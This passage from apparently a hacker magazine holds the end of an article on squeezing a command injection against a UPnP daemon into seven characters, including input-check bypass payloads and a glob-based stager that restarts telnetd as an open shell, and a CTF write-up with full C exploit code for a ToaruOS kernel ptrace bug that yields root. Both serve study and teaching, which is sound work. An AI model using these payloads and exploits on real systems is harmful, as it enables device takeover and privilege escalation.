ext_port = GetFirstDocumentItem(ca_event->ActionRequest, "NewExternalPort")
...
/* validate the ports */
a = atoi(ext_port);
if (a > 65535 || a < 1)
{
return -1;
}
The concept of implementing value control is a good one, but unfortunately for developers, it is done incorrectly by using the atoi() function. Consider the file test_atoi.c as an example, containing the following C code.
#include <stdio.h>
#include <stdlib.h>
int main() {
char numberStr[] = "5`BB`";
int a = atoi(numberStr);
if (a > 65535 || a < 1)
{
return -1;
}
return 0;
}
Compile it using the command below, then after executing it, let's retrieve the value of the return code.

  $ gcc test_atoi.c -o test_atoi
  $ ./test_atoi
  $ echo $?
  0

It is clear that the payload (value contained in the NewExternalPort node) has bypassed the security check. What happens is that the atoi() function converts a string into an integer, stopping at the first non-numeric character. The function will first encounter the character 5, which is a valid numeric character. After the 5, it encounters the backtick character. Since backticks are not part of a valid integer, atoi() will stop parsing the string at this point.

By using a payload that bypasses this check, the number of characters available for command injection will be reduced. Nodes NewExternalPort and NewInternalPort must follow the structure of "5`BB`" and "6`DDD" for example (but it depends on the target you want to exploit).

Although we currently have fewer characters at our disposal, let's try to go one step further and make the security features more complex.

---------------------------------------------------------------------------

--[ 7. Becoming a Bash Jiu Jitsu black belt

Port checks having been bypassed, let's imagine that the target now checks the IP value using the inet_aton() function as shown below.
int_ip = GetFirstDocumentItem(ca_event->ActionRequest, "NewInternalClient")
...
/* validate the IP address */
struct in_addr req_addr;
if (0 == inet_aton(int_ip, &req_addr))
{
return -1;
}
Consider the file test_inet_aton.c as an example, containing the following C code.
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
int main() {
const char *ip_str_a = "192.168.1.1";
const char *ip_str_b = "192.168.1.1 `C`";
struct in_addr addr_a;
struct in_addr addr_b;
if (0 == inet_aton(ip_str_a, &addr_a)) {
printf("Internal Error.\n");
return -1;
}
if (0 == inet_aton(ip_str_b, &addr_b)) {
printf("Internal Error.\n");
return -1;
}
return 0;
}
Compile it using the command below, then after executing it, let's retrieve the value of the return code.

  $ gcc test_inet_aton.c -o test_inet_aton
  $ ./test_inet_aton
  $ echo $?
  0

What happens is that inet_aton() will succeed in converting the IP address as long as the initial part of the string is a valid IP address format. After parsing "192.168.1.1", inet_aton() will encounter " `C`". These characters are not valid for an IP address and are simply ignored by inet_aton(). Consequently, the in_addr structure will contain the binary representation of the IP address "192.168.1.1".

  $ U ;A` --dport 5`BB` -j DNAT --to 192.168.1.1 `C`:6`DDD
  ...
  sh: --dport: command not found
  sh: -j: command not found
  sh: :6: command not found
  sh: ABBCDDD: command not found

  $ U ;A` -d 192.168.1.1 `C` --dport `DDDD -j ACCEPT
  ...
  sh: -d: command not found
  sh: --dport: command not found
  sh: ACDDDD: command not found

All security checks have been bypassed, leaving 7 (or 6) characters to carry out the command injection if the IP is 192.168.1.1, and 9 (or 8) if the IP has the format of 10.10.0.1. In other words, the format of the target's IP determines the number of characters controllable for the injection. Depending on the vendor, different default IPs can be defined for their network equipment, but the formats of the two IPs mentioned above are generally the most common.

---------------------------------------------------------------------------

--[ 8. Claiming supremacy over the mats

The intriguing part is answering the question: how can arbitrary commands be executed when only 7 characters are known to be controllable? The answer is to take advantage of globbing.

Globbing is the process of pattern matching for filenames and behaves similarly across shells like sh, bash, ash, and dash, as they all follow POSIX standards. Common globbing patterns such as *, ?, and [...] are supported in all these shells, allowing users to match groups of files using wildcards. However, bash stands out by offering advanced features like extended globbing and recursive globbing with **, which are not available in ash, dash, or sh, which are more minimalistic and focus on speed and efficiency.

The order in which files are matched during globbing in shells generally follows lexicographical order, but it may vary depending on the system's locale. Typically, in UTF-8 or ASCII environments, files starting with digits come first, followed by uppercase letters and then lowercase letters. For files whose filenames contain special characters, different behaviors have been observed, where they may be listed either first or last. While the basic globbing behavior is consistent across all shells, differences may arise if the locale changes, affecting how special characters, numbers, and letters are ordered.

Here is a simple example. Consider the previous virtual machine, and create files using the command below.

  $ touch .A .B .a .b .1

With bash (or zsh) as the shell, the following result is obtained.

  $ echo .?
  .1 .a .A .b .B

However, with ash (BusyBox version), the following result is obtained.

  $ echo .?
  .. .1 .A .B .a .b

After a little investigation, the discrepancies appear to come from locale differences between interpreters. ash uses the C locale (also known as the POSIX locale), which is the default system locale typically used in Unix-like operating systems when no specific locale is set. The related sorting does not take into account accents, case sensitivity, or linguistic rules. Characters are sorted in the following order (ASCII values of characters).

  - Digits (0-9) first.
  - Uppercase letters (A-Z) next.
  - Lowercase letters (a-z) last.
  - Special characters (like !, #, etc.) have a predefined order, which is based on their ASCII values.

It is time to put little dishes into the big ones and mix all the ingredients together to make a good soup.
To do this, the first thing we need to do is define the only limitation that our technique confronts us with. As a stager is about to be created, the current directory of the process being exploited (upnpd) must be writable.

The CWD environment variable typically refers to the current working directory of the shell or process. It holds the path of the directory in which the process is running or where it was launched from (however, it is important to note that CWD is not a standard environment variable on all systems; it is more commonly used in certain applications or scripts to track the current directory). Alternatively, the /proc/self/cwd symbolic link in Linux can be used to track the current working directory of a running process by pointing to the directory in which the process is currently operating. Since /proc/self refers to the current process, accessing /proc/self/cwd provides the absolute path to that process's working directory. Note that this link is automatically updated when the process changes its working directory, such as when it executes the cd command or changes directories programmatically. By reading the target of /proc/self/cwd, the working directory of a process can be programmatically determined at any given time (making it a useful tool for monitoring).

Let's start with the simplest case (using ash), taking control of the target when we can execute an 8-character command.

Create files named "killall" and "telnetd".

$ >killall
$ >telnetd

Kill telnetd and restart it with the desired options (-lsh).

$ k* t*
$ t* -lsh

Yes, it is that simple. The same process may be used with 7 characters.

Clean current directory (/proc/self/cwd).

$ rm -r *

Writing string "killal\n" into ".a".

$ >killal
$ >echo
$ *>>l
$ cp l .a
$ rm -r *

Writing string " echo\n" into ".c".

$ >" "
$ >echo
$ e* *>>l
$ cp l .c
$ rm -r *

Writing string "telnet\n" into ".d".

$ >telnet
$ >echo
$ *>>l
$ cp l .d
$ rm -r *

Writing string "lsh\n" into ".g".
$ >lsh
$ >echo
$ *>>l
$ cp l .g
$ rm -r *

Writing string "killal" into ".a".

$ >head
$ cp .a f
$ cp f h*
$ rm f
$ >-c
$ >6
$ h* *>>h
$ cp h .a
$ rm h

Writing string "telnet" into ".d".

$ cp .d f
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .d
$ rm h

Writing string "lsh" into ".g".

$ cp .g f
$ cp f h*
$ rm f
$ rm 6
$ >3
$ h* *>>h
$ cp h .g
$ rm h

Writing string " " into ".c".

$ cp .c f
$ cp f h*
$ rm f
$ rm 3
$ >1
$ h* *>>h
$ cp h .c
$ rm h

Writing string "l" into ".b".

$ >echo
$ e* l>>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .b
$ rm h

Writing string "d" into ".e".

$ >echo
$ e* d>>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .e
$ rm h

Writing string "-" into ".f".

$ >echo
$ e* ->>f
$ rm echo
$ cp f h*
$ rm f
$ h* *>>h
$ cp h .f
$ rm h

Executing command "killall telnetd".

$ >cat
$ cp .a A
$ cp .b B
$ cp .c C
$ cp .d D
$ cp .e E
$ c* ?|sh

Executing command "telnetd -lsh".

$ cp .d A
$ cp .e B
$ cp .c C
$ cp .f D
$ cp .g E
$ c* ?|sh

---------------------------------------------------------------------------

--[ 9. Conclusion

Of course, the chosen target was just an excuse (as many vulnerabilities have already been identified and exploited in the past) for presenting the very subject of the article, which is the optimization of command injection in the context of using a limited number of characters. We have demonstrated that even with just a few characters at our disposal, we are capable of writing a stager (in a file) that can execute a real malicious payload and thus compromise a device.

---------------------------------------------------------------------------

--[ 10. Acknowledgments (527e876c0d7e3049d1d99f00f3fbf9a9b0c63ccf)

I'd like to thank all the people we have come to know and will come to know in our lives as hackers, as well as all those who have made the effort to document their research work, and will do so in the future. We can finally become immortals. Thank you for everything.
--------------------------------------------------------------------------- --[ 11. References
|=-----------------------------------------------------------------------=|
|=----------------------=[ 8 - Breaking ToaruOS ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=----------------=[ CTF as a kernel exploitation intro ]=---------------=|
|=-----------------------------------------------------------------------=|
|=-------------=[ NOT / Firzen ]=---------=[ Binary Gecko ]=-------------=|
|=-----------------------------------------------------------------------=|

---[ Index

    0 - Introduction
    1 - The Challenge
        1.1 - Environment
    2 - ToaruOS
        2.1 - Mitigations
    3 - Kernel Bugs
    4 - Searching for a bug
        4.1 - How to open a file
        4.2 - Becoming root normally
        4.3 - SUID on the kernel side
        4.4 - ptrace
        4.5 - Poking the first hole
        4.6 - Flat mapping excursion
    5 - The bug
    6 - Write-what-where, but where?
        6.1 - No KASLR
        6.2 - SUIDn't
    7 - In Closing
    A - Exploit Code
In this article I would like to talk about the process of finding and exploiting a kernel zero day. I will use a CTF challenge about finding zero days in a hobby OS kernel as scaffolding and walk through the layers of protection that the kernel provides and one of the zero days used to break them. I think it is a great way to dive into some of the lower level code and bug classes that can only occur on a kernel level without having to first understand the internals of a major modern OS kernel and its many mitigations.
During the 38C3 conference HXP hosted a CTF that included a kernel exploitation challenge called "Ser Szwajcarski" (Polish for Swiss cheese). Apart from the name the challenge was unusual in two other respects: Firstly, it wasn't for any major OS, but instead for a relatively niche hobby kernel.
Secondly, it targeted what was then the current version of the OS.
So really, the challenge was to find a zero day for the OS.
Before we get into the details, what was the setup of the challenge?
You were provided a low-priv remote shell running on ToaruOS and had
to access the flag in a file that only the root user could access.
They also provided a Dockerfile so that you could set up an identical local test environment.
So, what kind of OS is ToaruOS? It is a unix-like hobby OS written by Kevin Lange. It is one of the more advanced hobby OS projects and still actively being developed. But this isn't a history lesson, so I'll get straight to the parts that are relevant to us.
Modern operating systems employ a large number of mitigations to make them more resilient, for safety and for security. I'll give a brief overview of the major common ones on x86_64 Linux and then, at the end of this section, go over how they apply to ToaruOS. Basically all of them have analogues for different architectures and operating systems, but that's way too much to cover. I am also leaving out several other mitigations that aren't relevant to the vulnerability or are Linux-specific.
On x86 the CPU can run with several distinct privilege levels called rings. These restrict which actions the CPU is allowed to perform. For example you can not change the CR3 register, which points to the page directory, while in ring 3. For this article all you need to know is that ring 0 is 'kernel mode' and ring 3 is 'user mode'. This is why system calls exist. A system call is just a CPU in ring 3 causing an interrupt that is handled by the kernel in ring 0. That code in the kernel then interprets the request and checks if it is sane and allowed. If so it then performs an action on behalf of that ring 3 request.
A page is a physical region of memory that can be mapped to one or more
virtual addresses. These mappings have several flags that determine
how the mapped page can be accessed. For this article we only care
about the following 3 flags:
P   - Present          Is this page mapped at all?
R/W - Read/Write       Is this page read-only or writable?
U/S - User/Supervisor  Is this page accessible from ring 3 or only ring 0?

I want to explicitly point out that these flags exist for each separate mapping of a page. The same physical page can be mapped at multiple virtual addresses with different permissions.
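To make the three flags a bit more concrete, here is a minimal sketch of how they could be read out of a raw x86_64 page table entry. The bit positions (P = bit 0, R/W = bit 1, U/S = bit 2) are architectural; the macro and function names are made up for this illustration and are not taken from ToaruOS. It also looks at a single entry only, while real hardware combines the flags of every level of the page table walk.

```c
#include <stdbool.h>
#include <stdint.h>

/* Low flag bits of an x86_64 page table entry.
 * The names are hypothetical, the bit positions are architectural. */
#define PTE_PRESENT  (1ULL << 0)  /* P:   is this page mapped at all?      */
#define PTE_WRITABLE (1ULL << 1)  /* R/W: 0 = read-only, 1 = writable      */
#define PTE_USER     (1ULL << 2)  /* U/S: 0 = ring 0 only, 1 = ring 3 too  */

/* Could ring 3 read through this mapping? */
static bool pte_user_can_read(uint64_t pte)
{
    return (pte & PTE_PRESENT) && (pte & PTE_USER);
}

/* Could ring 3 write through this mapping? Needs all three bits. */
static bool pte_user_can_write(uint64_t pte)
{
    return pte_user_can_read(pte) && (pte & PTE_WRITABLE);
}
```

Note that a user-mode write needs both R/W and U/S. Keep that in mind when we look at the ptrace checks later.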
KASLR is the kernel version of the user space ASLR you may already be familiar with. What this effectively means is that you don't know ahead of time where in memory the kernel will be mapped.
SMEP and SMAP prevent the kernel from accessing userspace memory directly through a pointer. With SMAP, any data access has to instead go through special functions that will temporarily disable the mitigation. With SMEP, any execution of userspace memory in kernel mode is completely disallowed. When the kernel returns to userspace it has to also switch to user mode at the same time.
+ CPU rings
+ Page Protections
- KASLR
- SMEP/SMAP
On ToaruOS the first two mitigations exist and the latter two don't. This is more or less expected since the first two are mainly enforced by the hardware architecture rather than the OS. The first three of those are the ones you should keep in mind for the rest of this article.
We are all very used to the security guarantees that our OS provides and most of us probably take them for granted. Of course, you can't open /etc/shadow as a normal user. Of course, you can't just attach a debugger to a root process and alter what it does. Of course, you can't change the owner of an suid executable and keep the suid flag. But all of those things are enforced by the operating system. It is common to become root or SYSTEM to demonstrate a kernel exploit, but the truth is that you effectively have even higher privileges. If the OS, specifically the kernel, isn't stopping you, you can do anything. (Yes, I am ignoring hypervisor based security for dramatic reasons) All this to say: Kernel bugs may have the same root causes as many user space bugs, but there are also entirely different bug classes that can only really exist in a kernel. So, I encourage you to challenge your preconceptions and question even those "obvious" security concepts. ToaruOS has quite a few similarities to Linux, so it is tempting to assume it provides all of the same guarantees.
Since the kernel's job is to enforce security guarantees it makes sense to start by looking at how exactly it does that. Our goal is simply to read a file, so let's look at how we may be able to open it.
If you want to open a file in C you call the libc open() function. This function internally then issues the corresponding system call. The kernel side code of ToaruOS that handles the syscall is sys_open() in '/kernel/sys/syscall.c'.
long sys_open(const char * file, long flags, long mode) {
PTR_VALIDATE(file);
if (!file) return -EFAULT;
fs_node_t * node = kopen((char *)file, flags);
int access_bits = 0;
if (node && (flags & O_CREAT) && (flags & O_EXCL)) {
close_fs(node);
return -EEXIST;
}
...
The first thing the kernel does is to check that 'file' is a valid user space pointer. The 'ptr_validate()' function checks that the address is in user space and is mapped with appropriate flags. This will be important later. It then tries to open that file with 'kopen' and fails with '-EEXIST' if the file already exists and exclusive creation ('O_CREAT' together with 'O_EXCL') was requested. Afterwards, it continues to perform access checks. This is how the OS enforces file system access permissions. If you want to open a file it will check all of the permissions before the file is ever visible in user mode.
...
int fd = process_append_fd(this_core->current_process, node);
...
return fd;
}
If all the checks have passed 'process_append_fd()' is called and the file descriptor is now visible in the user mode process. 'fd' is then returned from the system call and the libc then returns it from 'open()'. Since the checks here look sane, we need to either change the file's permissions or elevate our privileges. Let's take a look at elevating privileges.
You may have wondered how 'sudo' can make you 'root' on a Linux system. It is definitely one of those "obvious" things I mentioned earlier, so you may never have given it a second thought. But if you do, it seems a little odd. 'sudo' is a program that runs in 'user mode' in ring 3 like any other. It can't issue a magic CPU instruction that changes the user and it can't write in kernel memory. If it could then so could any other user mode process. Clearly it uses the 'setuid()' libc function, but using it to switch to another user requires privileges. But we can run 'sudo' as a low-privileged user to become root, so what makes 'sudo' special? You probably already know that the way it works is that the file system doesn't just store permissions for read/write/execute access, but can also store flags and capabilities. Particularly the SUID flag denotes that a program should be executed not as the user that starts it, but as the user that owns the file. On ToaruOS it works exactly the same way as it does on Linux:
local@livecd ~$ ls -al /bin/sudo
-r-sr-xr-x 1 root root 10384 Mar 16 17:26 /bin/sudo
Note that instead of 'x' it shows 's' for the execute permission, showing the SUID bit is set.
The implementation of the SUID bit is very straight-forward in ToaruOS and can be found in 'elf_exec()' in '/kernel/misc/elf64.c'.
if ((file->mask & S_ISUID) &&
!(this_core->current_process->flags &
(PROC_FLAG_TRACE_SYSCALLS | PROC_FLAG_TRACE_SIGNALS)))
{
/* setuid */
this_core->current_process->user = file->uid;
}
This is already the full implementation. If the 'S_ISUID' flag of the file is set the user id of the process is set to the owner of the file. The second half of the if clause exists so that if you start an SUID binary with a debugger attached it doesn't change the user.
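The decision above is small enough to model in user space. The following is a sketch of the logic only, under the assumption that the two trace flags can be collapsed into a single boolean; 'uid_after_exec()' and its parameters are names invented for this illustration, not kernel code.

```c
#include <stdbool.h>
#include <sys/stat.h>   /* S_ISUID */
#include <sys/types.h>  /* uid_t, mode_t */

/* Hypothetical model of the SUID decision in elf_exec().
 * 'traced' stands in for "PROC_FLAG_TRACE_SYSCALLS or
 * PROC_FLAG_TRACE_SIGNALS is set on the current process". */
static uid_t uid_after_exec(uid_t current_uid, uid_t file_owner,
                            mode_t file_mode, bool traced)
{
    if ((file_mode & S_ISUID) && !traced) {
        /* setuid: the process takes on the owner of the file */
        return file_owner;
    }
    /* not SUID, or a debugger is attached: nothing changes */
    return current_uid;
}
```

With the '/bin/sudo' listing from before (mode 04555, owner root), an untraced uid 1000 would come out as uid 0, a traced one would stay 1000.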
ToaruOS has the ability to debug programs in user space. It has a 'ptrace' syscall to do this, similar to the way it works on Linux. 'ptrace' lets you attach to a process - the 'tracee' - and to manipulate it in various ways as the 'tracer'. You can read registers, single-step, read or alter memory, etc. 'ptrace_handle()' in '/kernel/sys/ptrace.c' implements it in ToaruOS. That function is just a huge switch statement based on which of these operations was requested. Instead let's look at 'ptrace_peek()' and 'ptrace_poke()' for the moment. 'peek' reads a byte and 'poke' writes a byte in the tracee. Keep in mind that when we are in the 'ptrace' syscall the current process is the 'tracer', not the 'tracee'. Let's start with 'ptrace_peek()':
long ptrace_peek(pid_t pid, void * addr, void * data) {
if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
process_t * tracee = process_from_pid(pid);
if (!tracee
|| (tracee->tracer != this_core->current_process->id)
|| !(tracee->flags & PROC_FLAG_SUSPENDED)
)
return -ESRCH;
Again it starts by verifying a user provided pointer 'data'. But notably it does NOT verify 'addr'. We will get back to that. Then it looks up the 'tracee' process. If the 'tracee' doesn't exist, or if we aren't the 'tracer', or if the process isn't in a suspended state we will error out.
union PML * page_entry = mmu_get_page_other(
tracee->thread.page_directory->directory, (uintptr_t)addr);
if (!page_entry) return -EFAULT;
if (!mmu_page_is_user_readable(page_entry)) return -EFAULT;
Next, it gets the page table entry of the provided address 'addr' in the 'tracee' process. The reason 'ptr_validate()' isn't used for 'addr' is that the address is not a pointer to memory in the currently running process, but instead in the 'tracee'. If there is no corresponding entry we exit with '-EFAULT'. If there is an entry we check if it is user readable and if not we error out as well. The check is implemented in a macro.
#define mmu_page_is_user_readable(p) (p->bits.user)
It checks if the user bit on the page is set. What that means is that we could just read the page from ring 3, so we can not access anything new this way. This all seems sensible, so let's move on.
Taking a look at 'ptrace_poke()' it is very similar to 'ptrace_peek()'.
long ptrace_poke(pid_t pid, void * addr, void * data) {
if (!data || ptr_validate(data, "ptrace")) return -EFAULT;
process_t * tracee = process_from_pid(pid);
if (!tracee
|| (tracee->tracer != this_core->current_process->id)
|| !(tracee->flags & PROC_FLAG_SUSPENDED)) return -ESRCH;
union PML * page_entry = mmu_get_page_other(
tracee->thread.page_directory->directory, (uintptr_t)addr);
if (!page_entry) return -EFAULT;
if (!mmu_page_is_user_writable(page_entry)) return -EFAULT;
The only difference is that we check if the page is user writable now instead of readable, which seems sensible. But looking at the macro there's a glaring omission:
#define mmu_page_is_user_writable(p) (p->bits.writable)
It does check if the writable bit is set, but it does NOT check for the user bit.
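To see what the omission means in practice, here is a small user space sketch that compares the check as quoted with a stricter variant. 'union pml_sketch' is a cut-down stand-in for the kernel's 'union PML' that only carries the three flag bits, and the stricter function is my own assumption of what a complete check could look like, not the upstream fix.

```c
#include <stdbool.h>
#include <stdint.h>

/* Cut-down, hypothetical stand-in for the kernel's 'union PML'. */
union pml_sketch {
    struct {
        uint64_t present  : 1;
        uint64_t writable : 1;
        uint64_t user     : 1;
    } bits;
    uint64_t raw;
};

/* Same logic as the macro quoted above: only the writable bit counts. */
static bool is_user_writable_as_shipped(const union pml_sketch *p)
{
    return p->bits.writable;
}

/* Stricter variant (assumption): the mapping must also be present
 * and carry the user bit before ring 3 may write through it. */
static bool is_user_writable_strict(const union pml_sketch *p)
{
    return p->bits.present && p->bits.user && p->bits.writable;
}
```

For an entry with present=1, writable=1, user=0, which is what a writable kernel-only mapping looks like, the first function says yes and the second says no.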
Feel free to skip this section, it just clarifies some details about the way the write into another process works and is a little more verbose than the rest of the article. On x86 there is only one active page table at a given time (per CPU). Generally that page table is the one of the address space of the currently running process. But 'ptrace_poke' wants to write to a virtual address in the address space of a different process. You might have noticed earlier that the function that looks up the page table entry is called 'mmu_get_page_other()'. The 'page_entry' that the function returns refers to a physical page that is very likely not currently mapped anywhere in the address space of the current process. Looking at the rest of the ptrace_poke() function will help make things clearer.
uintptr_t mapped_address =
mmu_map_to_physical(tracee->thread.page_directory->directory,
(uintptr_t)addr);
if ((intptr_t)mapped_address < 0 && (intptr_t)mapped_address > -10)
return -EFAULT;
'mapped_address' is assigned the physical address that the virtual address 'addr' is mapped to in the 'tracee'. In order for a kernel to not have to constantly map and unmap pages it is common to instead have a flat virtual mapping of all physical memory at some fixed offset, so that any virtual address inside it minus that offset is the corresponding physical address. In ToaruOS that offset is:
#define HIGH_MAP_REGION 0xffffff8000000000UL
void * mmu_map_from_physical(uintptr_t frameaddress) {
return (void*)(frameaddress | HIGH_MAP_REGION);
}
This flat mapping is writable because the kernel is responsible for performing access checks and because it can not know ahead of time if a given physical address may need to be written to in the future. Finally here is the rest of 'ptrace_poke()'.
uintptr_t blarg = (uintptr_t)mmu_map_from_physical(mapped_address);
*(char*)blarg = *(char*)data;
return 0;
'blarg' becomes the pointer into the flat mapping which is writable and 'data' is written to it. As mentioned earlier, the access flags of a memory page are a property of the virtual mapping and not of the page itself. That is why 'mmu_page_is_user_writable()' needs to be explicitly checked by the kernel instead of just attempting to write and seeing if it fails.
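The address arithmetic of the flat mapping can be sketched in a few lines. 'FLAT_BASE' has the same value as 'HIGH_MAP_REGION' above; the two helper names are made up for this illustration. The OR used by ToaruOS is equivalent to adding the offset as long as the physical address fits below bit 39, which this sketch simply assumes.

```c
#include <stdint.h>

/* Same value as HIGH_MAP_REGION in the listing above. */
#define FLAT_BASE 0xffffff8000000000ULL

/* Physical address -> address inside the flat mapping
 * (hypothetical helper mirroring mmu_map_from_physical()). */
static uint64_t flat_from_physical(uint64_t phys)
{
    return phys | FLAT_BASE;
}

/* Address inside the flat mapping -> physical address. */
static uint64_t flat_to_physical(uint64_t virt)
{
    return virt & ~FLAT_BASE;
}
```

An arbitrary physical address like 0x2345678 would show up at 0xffffff8002345678 in the flat mapping, no matter which process is currently running.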
Why is that a problem and what can we do with it? At first glance it may seem useless. The page probably doesn't have the user bit set anyway, so we still can't write to it from user mode. But during a syscall we aren't in user mode. The kernel handles syscalls in ring 0 and it is allowed to access non-user pages. 'ptrace()' is exactly such a syscall, which means that if we provide a valid kernel address and it is writable the write will succeed. Luckily, the mapping of the kernel itself is read/write/execute. I suspect this is because it is a LOT simpler to set it up that way before remapping the kernel to a high address. This means that for any address in the kernel itself we will pass the 'mmu_page_is_user_writable()' check. So this bug gives us a very nice one byte write-what-where primitive.
Ideally we would like to just overwrite our own process's uid to be 0 to become root. Unfortunately for us, the check in 'ptrace_peek()' is correct. So, while we can write in the kernel, we can't read anything anywhere in it.
ToaruOS doesn't have KASLR, so we know exactly where in memory the kernel is ahead of time. But what does that gain us? We could try to overwrite a global pointer, for example the current process and point it into our user space memory to a fake data structure. This would probably work since ToaruOS doesn't have SMAP. We could overwrite the address of an interrupt handler or a syscall or some other function pointer and redirect it so that we can run our own code in ring 0. This, too, would probably work since ToaruOS doesn't have SMEP. But both of these strategies require some extra effort in faking a data structure or writing C code that works properly in ring 0.
The exploit strategy I ended up using was a lot simpler to implement. We can alter kernel memory anywhere, even the .text section and we know where everything is since there's no KASLR. Remember the SUID check in 'elf_exec' that I talked about in the section on SUID on the kernel side? Because we know the exact version of the kernel, we can simply look at the kernel image or read /proc/kallsyms in our local instance to find out at which address in virtual memory that function is.
local@livecd ~$ sudo cat /proc/kallsyms | grep elf_exec
000000000010f300 elf_exec
Disassembling the function with 'objdump' we can find the exact jump instruction that implements the if statement for SUID binaries. It is compiled to a 'jne' (jump not equal) conditional jump instruction that skips past the uid assignment if the binary isn't SUID.
10f365: 0f 85 48 01 00 00 jne 0x10f4b3
To turn 'jne' into 'je' we just need to flip the 0x85 into a 0x84 byte.
10f365: 0f 84 48 01 00 00 je 0x10f4b3
This negates the check so that now only non-SUID binaries will take on their owner's uid. Afterwards, simply running '/bin/esh' turns you into root and you can read the flag.
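If you want to double check the bytes before poking a kernel, the following sketch decodes the jump target from the six instruction bytes shown above and performs the one byte flip on a local copy. The function names are made up for this illustration and a little-endian host is assumed.

```c
#include <stdint.h>
#include <string.h>

/* Target of a near conditional jump "0f 8x rel32" located at 'addr'.
 * The displacement is relative to the end of the 6-byte instruction. */
static uint64_t jcc_rel32_target(uint64_t addr, const uint8_t insn[6])
{
    int32_t rel;
    memcpy(&rel, insn + 2, sizeof rel);  /* little-endian host assumed */
    return addr + 6 + (int64_t)rel;
}

/* Turn jne (0f 85) into je (0f 84) in a local copy of the bytes.
 * Returns 0 on success, -1 if the bytes are not a near jne. */
static int patch_jne_to_je(uint8_t insn[6])
{
    if (insn[0] != 0x0f || insn[1] != 0x85)
        return -1;
    insn[1] = 0x84;  /* the only byte that differs */
    return 0;
}
```

For the bytes '0f 85 48 01 00 00' at 0x10f365 the target works out to 0x10f365 + 6 + 0x148 = 0x10f4b3, matching the disassembly, and the flip leaves the displacement untouched. The byte to overwrite lives at 0x10f365 + 1, which is exactly the address the exploit pokes.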
I hope this article can help some curious people get started in the kernel security space. If nothing else maybe it can give somebody an appreciation for it. I also hope it doesn't seem like I am disparaging ToaruOS in any way. I really like the project. Security is not its main focus and still it is likely more stable and secure than many other hobby OSes. Kernel security is very very hard and even harder on defense. It has many pitfalls, both because the kernel is the core of what protects everything on any OS and because there are many low level details that we usually have the luxury of ignoring in user space. I want to thank the HXP team for the fun CTF they hosted and my friends who I forced to proof-read for me. In particular Lukas Ratz, who motivated me to participate in the first place.
#include <stdio.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <string.h>
#include <signal.h>
#include <ctype.h>
#include <sys/wait.h>
#include <sys/signal.h>
#include <sys/signal_defs.h>
#include <syscall_nums.h>
int main(int argc, char** argv)
{
printf("[+] Starting exploit\n");
pid_t c_pid = fork();
if(c_pid<0)
{
printf("[-] Couldn't fork\n");
return -1;
}
// Child
if(c_pid==0)
{
//attaching debugger so we can ptrace_poke
if(ptrace(PTRACE_TRACEME,0,NULL,NULL))
{
return -1;
}
signal(SIGINT, SIG_IGN);
return 0;
}
int status = 0;
waitpid(c_pid, &status, WSTOPPED);
printf("[+] Child stopped as expected\n");
printf("[+] Replacing suid check\n");
char data[4];
//second opcode byte: 0x85 is jne, 0x84 is je
data[0] = 0x84;
//address of the jne after the suid check in elf_exec,
//+1 to skip the leading 0x0f opcode byte
void* target = (void*)(0x0010f365+1);
int ret = ptrace(PTRACE_POKEDATA, c_pid, target, &data[0]);
if(ret<0)
{
perror("ptrace");
return -1;
}
printf("[+] Should have broken check, get root shell\n");
char *n_argv[] = {"/bin/esh",NULL};
execve("/bin/esh", n_argv,NULL);
//only reached if execve failed
perror("execve");
return -1;
}
|=[ EOF ]=---------------------------------------------------------------=|